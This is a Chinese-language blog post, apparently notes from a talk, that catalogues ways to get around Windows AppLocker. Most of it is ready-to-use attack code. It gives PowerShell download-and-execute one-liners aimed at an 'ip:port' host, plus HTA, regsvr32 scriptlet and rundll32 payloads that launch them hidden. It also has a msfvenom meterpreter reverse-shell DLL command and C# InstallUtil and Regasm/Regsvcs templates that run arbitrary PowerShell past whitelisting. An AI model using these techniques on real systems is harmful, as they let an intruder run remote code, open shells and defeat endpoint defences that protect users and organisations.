AppLocker Bypass Techniques

发表于 | 分类于

from:
https://www.youtube.com/watch?v=z04NXAkhI4k

0x00 Command 和 Powershell 没被禁用,脚本被禁用

1463634732723.png

1、直接使用cmd powershell执行

Powershell:

1
IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Command:

1
powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

2、管道

Powershell:

1
Get-Content script.ps1 | iex

Command:

1
cmd.exe /K < payload.bat

3、hta

payload.hta

1
2
3
4
5
6
7
8
9
10
<HTML> 
<HEAD> 
<script language="VBScript">
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"
</script>
</HEAD> 
<BODY> 
</BODY> 
</HTML>

4、Regsvr32.exe

1463635632045.png

1
regsvr32 /u /n /s /i:payload.sct scrobj.dll
1
regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

payload.sct:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Learn from Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
			rat="powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')";
		new ActiveXObject("WScript.Shell").Run(rat,0,true);
	
		]]>
</script>
</registration>
</scriptlet>

5、rundll32

payload:

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

6、dll/cpl

payload.dll

1
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

运行:

1
rundll32 shell32.dll,Control_RunDLL payload.dll

将dll重命名为cpl,双击运行。

7、nishang 文件backdoor

1463637198093.png

nishang client

http://drops.wooyun.org/tips/8568

0x01 可执行目录

1463636584379.png

通过ps脚本扫描可写入的路径

下载地址:http://go.mssec.se/AppLockerBC

扫描可执行路径:

1463636944699.png

绕过AppLocker执行:

1463637026977.png

0x02 禁用powershell以后

1463637826926.png

配置禁用powershell

1463638029182.png

禁用以后再次打开powershell

1463641098991.png

1、通过.Net执行powershell

通过.Net执行powershell进行绕过:

1463641303551.png

C# templae
powershell.cs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
using System;
using System.Management.Automation;
namespace Powershell
{
	class Program
	{
		static void Main(string[] args)
		{
			PowerShell ps = PowerShell.Create();
			ps.AddCommand("Invoke-Expression");
			ps.AddArgument("payload");
			ps.Invoke();
		}
	}
}

编译exe以后不能直接运行,可以放到可执行目录执行,调用powershell。

2、InstallUtil

1463650505776.png

参考1:http://drops.wooyun.org/tips/8862

参考2: http://drops.wooyun.org/tips/8701

InstallUtil.cs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
using System;
using System.Management.Automation;
namespace Whitelist
{
	class Program
	{
		static void Main(string[] args)
		{
		}
	}
}
[System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
        	PowerShell ps = PowerShell.Create();
			ps.AddCommand("Invoke-Expression");
			ps.AddArgument("payload");
			ps.Invoke();			
        }

    }

编译以后用/U参数运行:

1
2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U InstallUtil.exe

3、Regasm & Regsvcs

1463650033395.png

Regasm.cs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Management.Automation;
namespace regsvcser
{
    
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }
		
		[ComUnregisterFunction] //This executes if registration fails
		public static void UnRegisterClass ( string key )
		{
			PowerShell ps = PowerShell.Create();
			ps.AddCommand("Invoke-Expression");
			ps.AddArgument("payload");
			ps.Invoke();	
		}
    }

}

使用方式为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Create Your Strong Name Key -> key.snk

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Regasm.dll 
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe Regasm.dll 
//Executes UnRegisterClass If you don't have permissions

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U Regasm.dll 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Regasm.dll 
//This calls the UnregisterClass Method

4、nishang 文件backdoor

虽然powershell被禁用了,但是仍然可执行shellcode。可以使用hta,macro等方式进行。

0x03 提权

提权到管理员权限,即可执行突破AppLocker的限制,执行exe和脚本

------本文结束,感谢阅读------